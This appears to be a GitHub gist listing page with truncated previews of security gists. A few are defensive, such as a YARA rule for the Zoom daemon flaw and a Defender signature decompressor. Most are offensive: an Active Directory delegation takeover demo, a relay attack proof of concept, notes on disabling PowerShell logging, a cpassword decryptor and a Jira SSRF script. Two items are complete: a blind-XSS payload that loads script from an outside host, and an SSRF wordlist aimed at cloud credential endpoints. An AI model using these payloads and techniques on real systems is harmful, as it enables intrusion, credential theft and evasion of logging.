voilet7z
karanlyons
/ ZoomDaemon.yara
Last active
August 5, 2024 23:37
Fixes for Zoom, RingCentral, Zhumu (and additional white labels) RCE vulnerabilities
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private rule Macho | |
| { | |
| meta: | |
| description = "private rule to match Mach-O binaries (copied from Apple's XProtect)" | |
| condition: | |
| uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca | |
| } | |
| rule ZoomDaemon | |
| { |
mattifestation
/ ExpandDefenderSig.ps1
Created
March 28, 2019 20:17
Decompresses Windows Defender AV signatures for exploration purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
HarmJ0y
/ rbcd_demo.ps1
Last active
November 3, 2025 20:14
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
3xocyte
/ rbcd_relay.py
Last active
July 31, 2025 14:25
poc resource-based constrain delegation relay attack tool
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a *very* rough PoC | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import base64 | |
| import random | |
| import struct |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Logs are held by default in the user profile: | |
| \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt | |
| this directory also hosts per-application logs | |
| -------------------------------------------------------------- | |
| Disable Logging... | |
| remove-module psreadline |
edeca
/ decrypt_cpassword.py
Created
November 7, 2018 15:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| from base64 import b64decode | |
| from binascii import unhexlify | |
| from Crypto.Cipher import AES | |
| ######## | |
| # Author: David Cannings | |
| # Date: 7th November 2018 | |
| # | |
| # Quick and dirty cpassword decryption tool, ported to Python from the |
Rhynorater
/ gist:311cf3981fda8303d65c27316e69209f
Last active
January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
topolik
/ json-deserialization-ldap.sh
Created
August 17, 2018 20:49
Backend script based on @pwntester JSON deserialization research
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "Starting Apache DS using docker @ ldap://localhost:10389" | |
| docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds | |
| echo "... waiting 20 seconds to start Apache DS" | |
| sleep 20 | |
| # password: secret, if used with LDAP login | |
| (cat <<"EOF" |
pwn1sher
/ jira-ssrf.py
Last active
August 21, 2019 19:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib2 | |
| import httplib | |
| import socket | |
| import ssl | |
| import sys | |
| import requests | |
| def MyResolver(host): | |
| if host in vhost: #Vhost |
jhaddix
/ cloud_metadata.txt
Last active
March 4, 2026 21:23
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
NewerOlder